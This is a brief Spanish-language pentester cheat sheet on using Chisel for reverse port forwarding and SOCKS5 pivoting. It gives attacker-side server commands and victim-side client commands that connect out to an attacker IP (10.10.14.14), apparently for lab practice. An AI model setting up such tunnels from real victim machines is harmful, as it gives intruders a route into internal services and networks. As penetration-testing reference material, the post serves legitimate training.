creep33

OSCP, BSCP, OSWP, eJPT
Cybersecurity Analyst && Pentester

Chisel

November 28, 2021

Chisel

Definición

Chisel es una herramienta hubicada en github, con la que podemos hacer port forwarding.

overview

Port Forwarding

Uso

Atacante:
- chisel server –reverse –port <puerto para chisel>
Victima:
- chisel client <ip del atacante>:<puerto para chisel> R:<puerto del servicio en maquina de atacante>:<ip a la que accede la maquina víctima (puede ser el loopback)>:<puerto del servicio>

Ejemplo

Atacante:
- chisel server –reverse –port 1234
Victima:
- chisel client 10.10.14.14:1234 R:8888:127.0.0.1:8888

Dynamic Port Forwarding (proxy)

Same as -D option in ssh but with chisel

Atacante:
- chisel server –reverse –port 1234 –socks5
Victima:
- chisel client 10.10.14.14:1234 R:socks

And then chisel will start a SOCK5 proxy in 127.0.0.1:1080